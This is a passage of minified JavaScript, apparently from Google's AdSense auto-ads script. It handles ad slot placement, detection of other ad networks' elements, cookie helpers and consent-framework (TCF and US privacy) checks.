yi(a){return function(b){return b.minWidth()<=a}}function zi(a,b,c,d){var e=a&&Ai(c,b),f=Bi(b,d);return function(g){return!(e&&g.height()>=f)}}function Ci(a){return function(b){return b.height()<=a}}function Ai(a,b){return ni(a,b)<Vf(b).clientHeight-100} function Di(a,b){var c=xi(b,a,"height",K);if(c)return c;var d=b.style.height;b.style.height="inherit";c=xi(b,a,"height",K);b.style.height=d;if(c)return c;c=Infinity;do(d=b.style&&K(b.style.height))&&(c=Math.min(c,d)),(d=xi(b,a,"maxHeight",K))&&(c=Math.min(c,d));while((b=b.parentElement)&&"HTML"!=b.tagName);return c}function Bi(a,b){var c=0==pd(a);return b&&c?Math.max(250,2*Vf(a).clientHeight/3):250};var R={},Ei=(R.google_ad_channel=!0,R.google_ad_client=!0,R.google_ad_host=!0,R.google_ad_host_channel=!0,R.google_adtest=!0,R.google_tag_for_child_directed_treatment=!0,R.google_tag_for_under_age_of_consent=!0,R.google_tag_partner=!0,R.google_restrict_data_processing=!0,R.google_page_url=!0,R.google_debug_params=!0,R.google_adbreak_test=!0,R.google_ad_frequency_hint=!0,R.google_admob_interstitial_slot=!0,R.google_admob_rewarded_slot=!0,R.google_max_ad_content_rating=!0,R.google_traffic_source=!0, R),Fi=RegExp("(^| )adsbygoogle($| )");function Gi(a,b){for(var c=0;c<b.length;c++){var d=b[c],e=zc(d.Rb);a[e]=d.value}};function Hi(a,b,c,d){this.l=a;this.i=b;this.j=c;this.h=d}function Ii(a,b){var c=[];try{c=b.querySelectorAll(a.l)}catch(g){}if(!c.length)return[];b=Ya(c);b=Ji(a,b);"number"===typeof a.i&&(c=a.i,0>c&&(c+=b.length),b=0<=c&&c<b.length?[b[c]]:[]);if("number"===typeof a.j){c=[];for(var d=0;d<b.length;d++){var e=Ki(b[d]),f=a.j;0>f&&(f+=e.length);0<=f&&f<e.length&&c.push(e[f])}b=c}return b} Hi.prototype.toString=function(){return JSON.stringify({nativeQuery:this.l,occurrenceIndex:this.i,paragraphIndex:this.j,ignoreMode:this.h})};function Ji(a,b){if(null==a.h)return b;switch(a.h){case 1:return b.slice(1);case 2:return b.slice(0,b.length-1);case 3:return b.slice(1,b.length-1);case 0:return b;default:throw Error("Unknown ignore mode: "+a.h);}}function Ki(a){var b=[];xd(a.getElementsByTagName("p"),function(c){100<=Li(c)&&b.push(c)});return b} function Li(a){if(3==a.nodeType)return a.length;if(1!=a.nodeType||"SCRIPT"==a.tagName)return 0;var b=0;xd(a.childNodes,function(c){b+=Li(c)});return b}function Mi(a){return 0==a.length||isNaN(a[0])?a:"\\"+(30+parseInt(a[0],10))+" "+a.substring(1)};function Ni(a){if(!a)return null;var b=A(a,7);if(A(a,1)||a.getId()||0<wb(a,4).length){var c=a.getId();b=wb(a,4);var d=A(a,1),e="";d&&(e+=d);c&&(e+="#"+Mi(c));if(b)for(c=0;c<b.length;c++)e+="."+Mi(b[c]);a=(b=e)?new Hi(b,A(a,2),A(a,5),Oi(A(a,6))):null}else a=b?new Hi(b,A(a,2),A(a,5),Oi(A(a,6))):null;return a}var Pi={1:1,2:2,3:3,0:0};function Oi(a){return null==a?a:Pi[a]}var Qi={1:0,2:1,3:2,4:3};function Ri(a){return a.google_ama_state=a.google_ama_state||{}} function Si(a){a=Ri(a);return a.optimization=a.optimization||{}};function Ti(a){switch(A(a,8)){case 1:case 2:if(null==a)var b=null;else b=G(a,Jd,1),null==b?b=null:(a=A(a,2),b=null==a?null:new Ld({Ga:[b],Ra:a}));return null!=b?Dd(b):Fd(Error("Missing dimension when creating placement id"));case 3:return Fd(Error("Missing dimension when creating placement id"));default:return Fd(Error("Invalid type: "+A(a,8)))}};function T(a){a=void 0===a?"":a;var b=Error.call(this);this.message=b.message;"stack"in b&&(this.stack=b.stack);this.name="TagError";this.message=a?"adsbygoogle.push() error: "+a:"";Error.captureStackTrace?Error.captureStackTrace(this,T):this.stack=Error().stack||""}v(T,Error);var Pf,Ui,fi=new ci;function Vi(a){null!=a&&(w.google_measure_js_timing=a);w.google_measure_js_timing||(a=fi,a.h=!1,a.i!=a.j.google_js_reporting_queue&&(bi()&&Ra(a.i,di),a.i.length=0))}(function(a){Pf=a||new Nf;"number"!==typeof w.google_srt&&(w.google_srt=Math.random());Of();Ui=new ei;Ui.Va(!0);"complete"==w.document.readyState?Vi():fi.h&&xc(w,"load",function(){Vi()})})();function Wi(a,b,c){return Ui.oa(a,b,c)}function Xi(a,b){return Ui.Oa(a,b)} function Yi(a,b,c){var d=O(Oh).h();!b.eid&&d.length&&(b.eid=d.toString());Qf(Pf,a,b,!0,c)}function Zi(a,b){Ui.Pa(a,b)}function $i(a,b,c,d){var e;Rh(b)?e=b.msg||gi(b.error):e=gi(b);return 0==e.indexOf("TagError")?(c=b instanceof Qh?b.error:b,c.pbr||(c.pbr=!0,Ui.I(a,b,.1,d,"puberror")),!1):Ui.I(a,b,c,d)};function aj(a){a=void 0===a?window:a;a=a.googletag;return(null==a?0:a.apiReady)?a:void 0};function bj(a){var b=aj(a);return b?Sa(Ta(b.pubads().getSlots(),function(c){return a.document.getElementById(c.getSlotElementId())}),function(c){return null!=c}):null}function cj(a,b){return Ya(a.document.querySelectorAll(b))}function dj(a){var b=[];a=u(a);for(var c=a.next();!c.done;c=a.next()){c=c.value;for(var d=!0,e=0;e<b.length;e++){var f=b[e];if(f.contains(c)){d=!1;break}if(c.contains(f)){d=!1;b[e]=c;break}}d&&b.push(c)}return b};function ej(a,b){function c(){d.push({anchor:e.anchor,position:e.position});return e.anchor==b.anchor&&e.position==b.position}for(var d=[],e=a;e;){switch(e.position){case 1:if(c())return d;e.position=2;case 2:if(c())return d;if(e.anchor.firstChild){e={anchor:e.anchor.firstChild,position:1};continue}else e.position=3;case 3:if(c())return d;e.position=4;case 4:if(c())return d}for(;e&&!e.anchor.nextSibling&&e.anchor.parentNode!=e.anchor.ownerDocument.body;){e={anchor:e.anchor.parentNode,position:3}; if(c())return d;e.position=4;if(c())return d}e&&e.anchor.nextSibling?e={anchor:e.anchor.nextSibling,position:1}:e=null}return d};function fj(a,b){this.i=a;this.h=b} function gj(a,b){var c=new Id,d=new Hd;b.forEach(function(e){if(Ib(e,Yd,1,ae)){e=Ib(e,Yd,1,ae);if(G(e,Wd,1)&&G(G(e,Wd,1),Jd,1)&&G(e,Wd,2)&&G(G(e,Wd,2),Jd,1)){var f=hj(a,G(G(e,Wd,1),Jd,1)),g=hj(a,G(G(e,Wd,2),Jd,1));if(f&&g)for(f=u(ej({anchor:f,position:A(G(e,Wd,1),2)},{anchor:g,position:A(G(e,Wd,2),2)})),g=f.next();!g.done;g=f.next())g=g.value,c.set(za(g.anchor),g.position)}G(e,Wd,3)&&G(G(e,Wd,3),Jd,1)&&(f=hj(a,G(G(e,Wd,3),Jd,1)))&&c.set(za(f),A(G(e,Wd,3),2))}else Ib(e,Zd,2,ae)?ij(a,Ib(e,Zd,2,ae), c):Ib(e,$d,3,ae)&&jj(a,Ib(e,$d,3,ae),d)});return new fj(c,d)}function ij(a,b,c){G(b,Jd,1)&&(a=kj(a,G(b,Jd,1)))&&a.forEach(function(d){d=za(d);c.set(d,1);c.set(d,4);c.set(d,2);c.set(d,3)})}function jj(a,b,c){G(b,Jd,1)&&(a=kj(a,G(b,Jd,1)))&&a.forEach(function(d){c.add(za(d))})}function hj(a,b){return(a=kj(a,b))&&0<a.length?a[0]:null}function kj(a,b){return(b=Ni(b))?Ii(b,a):null};function lj(){this.h=new p.Set}function mj(a){a=nj(a);return a.has("all")||a.has("after")}function oj(a){a=nj(a);return a.has("all")||a.has("before")}function pj(a,b,c){switch(c){case 2:case 3:break;case 1:case 4:b=b.parentElement;break;default:throw Error("Unknown RelativePosition: "+c);}for(c=[];b;){if(qj(b))return!0;if(a.h.has(b))break;c.push(b);b=b.parentElement}c.forEach(function(d){return a.h.add(d)});return!1} function qj(a){var b=nj(a);return a&&("AUTO-ADS-EXCLUSION-AREA"===a.tagName||b.has("inside")||b.has("all"))}function nj(a){return(a=a&&a.getAttribute("data-no-auto-ads"))?new p.Set(a.split("|")):new p.Set};function rj(a,b){if(!a)return!1;a=Nc(a,b);if(!a)return!1;a=a.cssFloat||a.styleFloat;return"left"==a||"right"==a}function sj(a){for(a=a.previousSibling;a&&1!=a.nodeType;)a=a.previousSibling;return a?a:null}function tj(a){return!!a.nextSibling||!!a.parentNode&&tj(a.parentNode)};function uj(a){var b={};a&&wb(a,6).forEach(function(c){b[c]=!0});return b}function vj(a,b,c,d,e){this.h=a;this.H=b;this.j=c;this.m=e||null;this.A=(this.C=d)?gj(a.document,H(d,Xd,5)):gj(a.document,[]);this.G=new lj;this.i=0;this.l=!1} function wj(a,b){if(a.l)return!0;a.l=!0;var c=H(a.j,ce,1);a.i=0;var d=uj(a.C);var e=a.h;try{var f=e.localStorage.getItem("google_ama_settings");var g=f?Nb(se,f):null}catch(S){g=null}var h=null!==g&&D(g,2,!1);g=Ri(e);h&&(g.eatf=!0,kd(7,[!0,0,!1]));var k=P(Ve)||P(Ue);f=P(Ue);if(k){b:{var l={fb:!1},m=cj(e,".google-auto-placed"),q=cj(e,'ins.adsbygoogle[data-anchor-shown="true"]'),t=cj(e,"ins.adsbygoogle[data-ad-format=autorelaxed]");var y=(bj(e)||cj(e,"div[id^=div-gpt-ad]")).concat(cj(e,"iframe[id^=google_ads_iframe]")); var F=cj(e,"div.trc_related_container,div.OUTBRAIN,div[id^=rcjsload],div[id^=ligatusframe],div[id^=crt-],iframe[id^=cto_iframe],div[id^=yandex_], div[id^=Ya_sync],iframe[src*=adnxs],div.advertisement--appnexus,div[id^=apn-ad],div[id^=amzn-native-ad],iframe[src*=amazon-adsystem],iframe[id^=ox_],iframe[src*=openx],img[src*=openx],div[class*=adtech],div[id^=adtech],iframe[src*=adtech],div[data-content-ad-placement=true],div.wpcnt div[id^=atatags-]"),z=cj(e,"ins.adsbygoogle-ablated-ad-slot"),E=cj(e,"div.googlepublisherpluginad"); k=[].concat(cj(e,"iframe[id^=aswift_],iframe[id^=google_ads_frame]"),cj(e,"ins.adsbygoogle"));h=[];l=u([[l.Mb,m],[l.fb,q],[l.Pb,t],[l.Nb,y],[l.Qb,F],[l.Lb,z],[l.Ob,E]]);for(m=l.next();!m.done;m=l.next())q=u(m.value),m=q.next().value,q=q.next().value,!1===m?h=h.concat(q):k=k.concat(q);k=dj(k);l=dj(h);h=k.slice(0);k=u(l);for(l=k.next();!l.done;l=k.next())for(l=l.value,m=0;m<h.length;m++)(l.contains(h[m])||h[m].contains(l))&&h.splice(m,1);e=Vf(e).clientHeight;for(k=0;k<h.length;k++)if(l=h[k].getBoundingClientRect(), !(0===l.height&&!f||l.top>e)){e=!0;break b}e=!1}g=e?g.eatfAbg=!0:!1}else g=h;if(g)return!0;g=new Hd([2]);for(e=0;e<c.length;e++){f=a;k=c[e];h=e;l=b;if(!G(k,Pd,4)||!g.contains(A(G(k,Pd,4),1))||1!==A(k,8)||k&&null!=A(k,4)&&d[A(G(k,Pd,4),2)])f=null;else{f.i++;if(k=xj(f,k,l,d))l=Ri(f.h),l.numAutoAdsPlaced||(l.numAutoAdsPlaced=0),null==l.placed&&(l.placed=[]),l.numAutoAdsPlaced++,l.placed.push({index:h,element:k.ha}),kd(7,[!1,f.i,!0]);f=k}if(f)return!0}kd(7,[!1,a.i,!1]);return!1} function xj(a,b,c,d){if(b&&null!=A(b,4)&&d[A(G(b,Pd,4),2)]||1!=A(b,8))return null;d=G(b,Jd,1);if(!d)return null;d=Ni(d);if(!d)return null;d=Ii(d,a.h.document);if(0==d.length)return null;d=d[0];var e=Qi[A(b,2)];e=void 0===e?null:e;var f;if(!(f=null==e)){a:{f=a.h;switch(e){case 0:f=rj(sj(d),f);break a;case 3:f=rj(d,f);break a;case 2:var g=d.lastChild;f=rj(g?1==g.nodeType?g:sj(g):null,f);break a}f=!1}if(c=!f&&!(!c&&2==e&&!tj(d)))c=1==e||2==e?d:d.parentNode,c=!(c&&!te(c)&&0>=c.offsetWidth);f=!c}if(!(c= f)){c=a.A;f=A(b,2);g=za(d);g=c.i.h.get(g);if(!(g=g?g.contains(f):!1))a:{if(c.h.contains(za(d)))switch(f){case 2:case 3:g=!0;break a;default:g=!1;break a}for(f=d.parentElement;f;){if(c.h.contains(za(f))){g=!0;break a}f=f.parentElement}g=!1}c=g}if(!c){c=a.G;f=A(b,2);a:switch(f){case 1:g=mj(d.previousElementSibling)||oj(d);break a;case 4:g=mj(d)||oj(d.nextElementSibling);break a;case 2:g=oj(d.firstElementChild);break a;case 3:g=mj(d.lastElementChild);break a;default:throw Error("Unknown RelativePosition: "+ f);}c=g||pj(c,d,f)}if(c)return null;c=G(b,be,3);f={};c&&(f.Wa=A(c,1),f.Ha=A(c,2),f.cb=!!xb(c,3));c=G(b,Pd,4)&&A(G(b,Pd,4),2)?A(G(b,Pd,4),2):null;c=Sd(c);g=null!=A(b,12)?A(b,12):null;g=null==g?null:new Qd(null,{google_ml_rank:g});b=yj(a,b);b=Rd(a.m,c,g,b);c=a.h;a=a.H;var h=c.document,k=f.cb||!1;g=(new Bc(h)).createElement("DIV");var l=g.style;l.width="100%";l.height="auto";l.clear=k?"both":"none";k=g.style;k.textAlign="center";f.lb&&Gi(k,f.lb);h=(new Bc(h)).createElement("INS");k=h.style;k.display= "block";k.margin="auto";k.backgroundColor="transparent";f.Wa&&(k.marginTop=f.Wa);f.Ha&&(k.marginBottom=f.Ha);f.ab&&Gi(k,f.ab);g.appendChild(h);f={ra:g,ha:h};f.ha.setAttribute("data-ad-format","auto");g=[];if(h=b&&b.Ja)f.ra.className=h.join(" ");h=f.ha;h.className="adsbygoogle";h.setAttribute("data-ad-client",a);g.length&&h.setAttribute("data-ad-channel",g.join("+"));a:{try{var m=f.ra;var q=void 0===q?0:q;if(P(Qe)){q=void 0===q?0:q;var t=Af(d,e,q);if(t.init){var y=t.init;for(d=y;d=t.ja(d);)y=d;var F= {anchor:y,position:t.na}}else F={anchor:d,position:e};m["google-ama-order-assurance"]=q;ue(m,F.anchor,F.position)}else ue(m,d,e);b:{var z=f.ha;z.dataset.adsbygoogleStatus="reserved";z.className+=" adsbygoogle-noablate";m={element:z};var E=b&&b.Qa;if(z.hasAttribute("data-pub-vars")){try{E=JSON.parse(z.getAttribute("data-pub-vars"))}catch(S){break b}z.removeAttribute("data-pub-vars")}E&&(m.params=E);(c.adsbygoogle=c.adsbygoogle||[]).push(m)}}catch(S){(z=f.ra)&&z.parentNode&&(E=z.parentNode,E.removeChild(z), te(E)&&(E.style.display=E.getAttribute("data-init-display")||"none"));z=!1;break a}z=!0}return z?f:null}function yj(a,b){return Bd(Ed(Ti(b).map(Td),function(c){Ri(a.h).exception=c}))};function zj(a){if(P(Pe))var b=null;else try{b=a.getItem("google_ama_config")}catch(d){b=null}try{var c=b?Nb(je,b):null}catch(d){c=null}return c};function Aj(a){J.call(this,a)}v(Aj,J);function Bj(a){try{var b=a.localStorage.getItem("google_auto_fc_cmp_setting")||null}catch(d){b=null}var c=b;return c?Gd(function(){return Nb(Aj,c)}):Dd(null)};function Cj(){this.S={}}function Dj(){if(Ej)return Ej;var a=md()||window,b=a.google_persistent_state_async;return null!=b&&"object"==typeof b&&null!=b.S&&"object"==typeof b.S?Ej=b:a.google_persistent_state_async=Ej=new Cj}function Fj(a){return Gj[a]||"google_ps_"+a}function Hj(a,b,c){b=Fj(b);a=a.S;var d=a[b];return void 0===d?a[b]=c:d}var Ej=null,Ij={},Gj=(Ij[8]="google_prev_ad_formats_by_region",Ij[9]="google_prev_ad_slotnames_by_region",Ij);function Jj(a){this.h=a||{cookie:""}} Jj.prototype.set=function(a,b,c){var d=!1;if("object"===typeof c){var e=c.Sb;d=c.Tb||!1;var f=c.domain||void 0;var g=c.path||void 0;var h=c.jb}if(/[;=\s]/.test(a))throw Error('Invalid cookie name "'+a+'"');if(/[;\r\n]/.test(b))throw Error('Invalid cookie value "'+b+'"');void 0===h&&(h=-1);this.h.cookie=a+"="+b+(f?";domain="+f:"")+(g?";path="+g:"")+(0>h?"":0==h?";expires="+(new Date(1970,1,1)).toUTCString():";expires="+(new Date(Date.now()+1E3*h)).toUTCString())+(d?";secure":"")+(null!=e?";samesite="+ e:"")};Jj.prototype.get=function(a,b){for(var c=a+"=",d=(this.h.cookie||"").split(";"),e=0,f;e<d.length;e++){f=Ja(d[e]);if(0==f.lastIndexOf(c,0))return f.substr(c.length);if(f==a)return""}return b};Jj.prototype.isEmpty=function(){return!this.h.cookie}; Jj.prototype.clear=function(){for(var a=(this.h.cookie||"").split(";"),b=[],c=[],d,e,f=0;f<a.length;f++)e=Ja(a[f]),d=e.indexOf("="),-1==d?(b.push(""),c.push(e)):(b.push(e.substring(0,d)),c.push(e.substring(d+1)));for(a=b.length-1;0<=a;a--)c=b[a],this.get(c),this.set(c,"",{jb:0,path:void 0,domain:void 0})};function Kj(a){J.call(this,a)}v(Kj,J);function Lj(a){var b=new Kj;return B(b,5,a)};function Mj(){this.A=this.A;this.G=this.G}Mj.prototype.A=!1;Mj.prototype.j=function(){if(this.G)for(;this.G.length;)this.G.shift()()};function Nj(a){void 0!==a.addtlConsent&&"string"!==typeof a.addtlConsent&&(a.addtlConsent=void 0);void 0!==a.gdprApplies&&"boolean"!==typeof a.gdprApplies&&(a.gdprApplies=void 0);return void 0!==a.tcString&&"string"!==typeof a.tcString||void 0!==a.listenerId&&"number"!==typeof a.listenerId?2:a.cmpStatus&&"error"!==a.cmpStatus?0:3}function Oj(a,b){b=void 0===b?500:b;Mj.call(this);this.h=a;this.i=null;this.m={};this.H=0;this.C=b;this.l=null}v(Oj,Mj); Oj.prototype.j=function(){this.m={};this.l&&(yc(this.h,this.l),delete this.l);delete this.m;delete this.h;delete this.i;Mj.prototype.j.call(this)};function Pj(a){return"function"===typeof a.h.__tcfapi||null!=Qj(a)} Oj.prototype.addEventListener=function(a){function b(f,g){clearTimeout(e);f?(c=f,c.internalErrorState=Nj(c),g&&0===c.internalErrorState||(c.tcString="tcunavailable",g||(c.internalErrorState=3))):(c.tcString="tcunavailable",c.internalErrorState=3);a(c)}var c={},d=wc(function(){return a(c)}),e=0;-1!==this.C&&(e=setTimeout(function(){c.tcString="tcunavailable";c.internalErrorState=1;d()},this.C));try{Rj(this,"addEventListener",b)}catch(f){c.tcString="tcunavailable",c.internalErrorState=3,e&&(clearTimeout(e), e=0),d()}};Oj.prototype.removeEventListener=function(a){a&&a.listenerId&&Rj(this,"removeEventListener",null,a.listenerId)};function Rj(a,b,c,d){c||(c=function(){});if("function"===typeof a.h.__tcfapi)a=a.h.__tcfapi,a(b,2,c,d);else if(Qj(a)){Sj(a);var e=++a.H;a.m[e]=c;a.i&&(c={},a.i.postMessage((c.__tcfapiCall={command:b,version:2,callId:e,parameter:d},c),"*"))}else c({},!1)}function Qj(a){if(a.i)return a.i;a.i=$c(a.h,"__tcfapiLocator");return a.i} function Sj(a){a.l||(a.l=function(b){try{var c=("string"===typeof b.data?JSON.parse(b.data):b.data).__tcfapiReturn;a.m[c.callId](c.returnValue,c.success)}catch(d){}},xc(a.h,"message",a.l))};function Tj(a){var b=a.u,c=a.ta,d=a.Ia;a=Uj({u:b,Z:a.Z,ka:void 0===a.ka?!1:a.ka,la:void 0===a.la?!1:a.la});null!=a.h||"tcunav"!=a.i.message?d(a):Vj(b,c).then(function(e){return e.map(Wj)}).then(function(e){return e.map(function(f){return Xj(b,f)})}).then(d)} function Uj(a){var b=a.u,c=a.Z,d=void 0===a.ka?!1:a.ka;if(!(a=!(void 0===a.la?0:a.la)&&Pj(new Oj(b)))){if(d=!d){if(c){c=Bj(b);if(null==c.h)Ui.I(806,c.i,void 0,void 0),c=!1;else if((c=c.h.value)&&null!=A(c,1))b:switch(c=A(c,1),c){case 1:c=!0;break b;default:throw Error("Unhandled AutoGdprFeatureStatus: "+c);}else c=!1;c=!c}d=c}a=d}if(!a)return Xj(b,Lj(!0));c=Dj();return(c=Hj(c,24))?Xj(b,Wj(c)):Fd(Error("tcunav"))}function Vj(a,b){return p.Promise.race([Yj(),Zj(a,b)])} function Yj(){return(new p.Promise(function(a){var b=Dj();a={resolve:a};var c=Hj(b,25,[]);c.push(a);b.S[Fj(25)]=c})).then(ak)}function Zj(a,b){return new p.Promise(function(c){a.setTimeout(c,b,Fd(Error("tcto")))})}function ak(a){return a?Dd(a):Fd(Error("tcnull"))} function Wj(a){var b=void 0===b?!1:b;if(!1===a.gdprApplies)var c=!0;else void 0===a.internalErrorState&&(a.internalErrorState=Nj(a)),c="error"===a.cmpStatus||0!==a.internalErrorState||"loaded"===a.cmpStatus&&("tcloaded"===a.eventStatus||"useractioncomplete"===a.eventStatus)?!0:!1;if(c)if(!1===a.gdprApplies||"tcunavailable"===a.tcString||void 0===a.gdprApplies&&!b||"string"!==typeof a.tcString||!a.tcString.length)a=!0;else{var d=void 0===d?"755":d;b:{if(a.publisher&&a.publisher.restrictions&&(b=a.publisher.restrictions["1"], void 0!==b)){b=b[void 0===d?"755":d];break b}b=void 0}0===b?a=!1:a.purpose&&a.vendor?(b=a.vendor.consents,(d=!(!b||!b[void 0===d?"755":d]))&&a.purposeOneTreatment&&"CH"===a.publisherCC?a=!0:(d&&(a=a.purpose.consents,d=!(!a||!a["1"])),a=d)):a=!0}else a=!1;return Lj(a)}function Xj(a,b){a:{a=void 0===a?window:a;if(xb(b,5))try{var c=a.localStorage;break a}catch(d){}c=null}return(b=c)?Dd(b):Fd(Error("unav"))};function bk(a){J.call(this,a)}v(bk,J);function ck(a){J.call(this,a,-1,dk)}v(ck,J);var dk=[1,2];function ek(a){this.exception=a}function fk(a,b,c){this.j=a;this.h=b;this.i=c}fk.prototype.start=function(){this.l()};fk.prototype.l=function(){try{switch(this.j.document.readyState){case "complete":case "interactive":wj(this.h,!0);gk(this);break;default:wj(this.h,!1)?gk(this):this.j.setTimeout(Ea(this.l,this),100)}}catch(a){gk(this,a)}};function gk(a,b){try{var c=a.i,d=c.resolve,e=a.h;Ri(e.h);H(e.j,ce,1);d.call(c,new ek(b))}catch(f){a.i.reject(f)}};function hk(a){J.call(this,a,-1,ik)}v(hk,J);function jk(a){J.call(this,a)}v(jk,J);function kk(a){J.call(this,a)}v(kk,J);var ik=[7];function lk(a){a=(a=(new Jj(a)).get("FCCDCF",""))?a:null;try{return a?Nb(hk,a):null}catch(b){return null}};Zb({Gb:0,Fb:1,Cb:2,xb:3,Db:4,yb:5,Eb:6,Ab:7,Bb:8,wb:9,zb:10}).map(function(a){return Number(a)});Zb({Ib:0,Jb:1,Hb:2}).map(function(a){return Number(a)});function mk(a){function b(){if(!a.frames.__uspapiLocator)if(c.body){var d=Mc("IFRAME",c);d.style.display="none";d.style.width="0px";d.style.height="0px";d.style.border="none";d.style.zIndex="-1000";d.style.left="-1000px";d.style.top="-1000px";d.name="__uspapiLocator";c.body.appendChild(d)}else a.setTimeout(b,5)}var c=a.document;b()};function nk(a){this.h=a;this.i=a.document;this.j=(a=(a=lk(this.i))?G(a,kk,5)||null:null)?A(a,2):null;(a=lk(this.i))&&G(a,jk,4);(a=lk(this.i))&&G(a,jk,4)}function ok(){var a=window;a.__uspapi||a.frames.__uspapiLocator||(a=new nk(a),pk(a))}function pk(a){!a.j||a.h.__uspapi||a.h.frames.__uspapiLocator||(a.h.__uspapiManager="fc",mk(a.h),Ga(function(){return a.l.apply(a,ka(ta.apply(0,arguments)))}))} nk.prototype.l=function(a,b,c){"function"===typeof c&&"getUSPData"===a&&c({version:1,uspString:this.j},!0)};function qk(a){J.call(this,a)}v(qk,J);qk.prototype.getWidth=function(){return C(this,1,0)};qk.prototype.getHeight=function(){return C(this,2,0)};function rk(a){J.call(this,a)}v(rk,J);function sk(a){J.call(this,a)}v(sk,J);var tk=[4,5];function uk(a){var b=/[a-zA-Z0-9._~-]/,c=/%[89a-zA-Z]./;return a.replace(/(%[a-zA-Z0-9]{2})/g,function(d){if(!d.match(c)){var e=decodeURIComponent(d);if(e.match(b))return e}return d.toUpperCase()})}function vk(a){for(var b="",c=/[/%?&=]/,d=0;d<a.length;++d){var e=a[d];b=e.match(c)?b+e:b+encodeURIComponent(e)}return b};function wk(a,b){a=vk(uk(a.location.pathname)).replace(/(^\/)|(\/$)/g,"");var c=Tc(a),d=xk(a);return r(b,"find").call(b,function(e){var f=null!=A(e,7)?A(G(e,oe,7),1):A(e,1);e=null!=A(e,7)?A(G(e,oe,7),2):2;if("number"!==typeof f)return!1;switch(e){case 1:return f==c;case 2:return d[f]||!1}return!1})||null}function xk(a){for(var b={};;){b[Tc(a)]=!0;if(!a)return b;a=a.substring(0,a.lastIndexOf("/"))}};var yk={},zk=(yk.google_ad_channel=!0,yk.google_ad_host=!0,yk);function Ak(a,b){a.location.href&&a.location.href.substring&&(b.url=a.location.href.substring(0,200));Yi("ama",b,.01)}function Bk(a){var b={};Sc(zk,function(c,d){d in a&&(b[d]=a[d])});return b};function Ck(a){a=G(a,le,3);return!a||A(a,1)<=Date.now()?!1:!0}function Dk(a){return(a=zj(a))?Ck(a)?a:null:null}function Ek(a,b){try{b.removeItem("google_ama_config")}catch(c){Ak(a,{lserr:1})}};function Fk(a){J.call(this,a)}v(Fk,J);function Gk(a){J.call(this,a,-1,Hk)}v(Gk,J);var Hk=[1];function Ik(a){J.call(this,a,-1,Jk)}v(Ik,J);Ik.prototype.getId=function(){return C(this,1,0)};Ik.prototype.V=function(){return C(this,7,0)};var Jk=[2];function Kk(a){J.call(this,a,-1,Lk)}v(Kk,J);Kk.prototype.V=function(){return C(this,5,0)};var Lk=[2];function Mk(a){J.call(this,a,-1,Nk)}v(Mk,J);function Ok(a){J.call(this,a,-1,Pk)}v(Ok,J);Ok.prototype.V=function(){return C(this,1,0)};function Qk(a){J.call(this,a)}v(Qk,J);var Nk=[1,4,2,3],Pk=[2];function Rk(a){J.call(this,a,-1,Sk)}v(Rk,J);function Tk(a){return Ib(a,Gk,14,Uk)}var Sk=[19],Uk=[13,14];var Vk=void 0;function Wk(){Yf(Vk,Xf);return Vk}function Xk(a){Yf(Vk,$f);Vk=a};function Yk(a,b,c,d){c=void 0===c?"":c;return 1===b&&Zk(c,void 0===d?null:d)?!0:$k(a,c,function(e){return Ua(H(e,Tb,2),function(f){return A(f,1)===b})})}function Zk(a,b){return b?13===Cb(b,Uk)?D(Ib(b,Fk,13,Uk),1):14===Cb(b,Uk)&&""!==a&&1===wb(Tk(b),1).length&&wb(Tk(b),1)[0]===a?D(G(Tk(b),Fk,2),1):!1:!1}function al(a,b){b=C(b,18,0);-1!==b&&(a.tmod=b)}function bl(a){var b=void 0===b?"":b;var c=Ic(L)||L;return cl(c,a)?!0:$k(L,b,function(d){return Ua(wb(d,3),function(e){return e===a})})} function dl(a){return $k(w,void 0===a?"":a,function(){return!0})}function cl(a,b){a=(a=(a=a.location&&a.location.hash)&&a.match(/forced_clientside_labs=([\d,]+)/))&&a[1];return!!a&&Xa(a.split(","),b.toString())}function $k(a,b,c){a=Ic(a)||a;var d=el(a);b&&(b=rd(String(b)));return Yb(d,function(e,f){return Object.prototype.hasOwnProperty.call(d,f)&&(!b||b===f)&&c(e)})}function el(a){a=fl(a);var b={};Sc(a,function(c,d){try{var e=new Rb(c);b[d]=e}catch(f){}});return b} function fl(a){return P(xe)?(a=Uj({u:a,Z:Wk()}),null!=a.h?(gl("ok"),a=hl(a.h.value)):(gl(a.i.message),a={}),a):hl(a.localStorage)}function hl(a){try{var b=a.getItem("google_adsense_settings");if(!b)return{};var c=JSON.parse(b);return c!==Object(c)?{}:Xb(c,function(d,e){return Object.prototype.hasOwnProperty.call(c,e)&&"string"===typeof e&&Array.isArray(d)})}catch(d){return{}}}function gl(a){P(we)&&Yi("abg_adsensesettings_lserr",{s:a,g:P(xe),c:Wk(),r:.01},.01)};function il(a,b,c,d){jl(new kl(a,b,c,d))}function kl(a,b,c,d){this.u=a;this.i=b;this.j=c;this.h=d}function jl(a){Ed(Cd(Uj({u:a.u,Z:D(a.i,6)}),function(b){ll(a,b,!0)}),function(){ml(a)})}function ll(a,b,c){Ed(Cd(nl(b),function(d){ol("ok");a.h(d)}),function(){Ek(a.u,b);c?ml(a):a.h(null)})}function ml(a){Ed(Cd(pl(a),a.h),function(){ql(a)})}function ql(a){Tj({u:a.u,Z:D(a.i,6),ta:50,Ia:function(b){rl(a,b)}})}function nl(a){return(a=Dk(a))?Dd(a):Fd(Error("invlocst"))} function pl(a){a:{var b=a.u;var c=a.j;a=a.i;if(13===Cb(a,Uk))b=(b=G(G(Ib(a,Fk,13,Uk),bk,2),ck,2))&&0<H(b,ce,1).length?b:null;else{if(14===Cb(a,Uk)){var d=wb(Tk(a),1),e=G(G(G(Tk(a),Fk,2),bk,2),ck,2);if(1===d.length&&d[0]===c&&e&&0<H(e,ce,1).length&&I(a,17)===b.location.host){b=e;break a}}b=null}}b?(c=new je,a=H(b,ce,1),c=Gb(c,1,a),b=H(b,me,2),b=Gb(c,7,b),b=Dd(b)):b=Fd(Error("invtag"));return b}function rl(a,b){Ed(Cd(b,function(c){ll(a,c,!1)}),function(c){ol(c.message);a.h(null)})} function ol(a){Yi("abg::amalserr",{status:a,guarding:"true",timeout:50,rate:.01},.01)};function sl(a){Ak(a,{atf:1})}function tl(a,b){(a.google_ama_state=a.google_ama_state||{}).exception=b;Ak(a,{atf:0})};function U(a){a.google_ad_modifications||(a.google_ad_modifications={});return a.google_ad_modifications}function ul(a){a=U(a);var b=a.space_collapsing||"none";return a.remove_ads_by_default?{Fa:!0,tb:b,qa:a.ablation_viewport_offset}:null}function vl(a,b){a=U(a);a.had_ads_ablation=!0;a.remove_ads_by_default=!0;a.space_collapsing="slot";a.ablation_viewport_offset=b}function 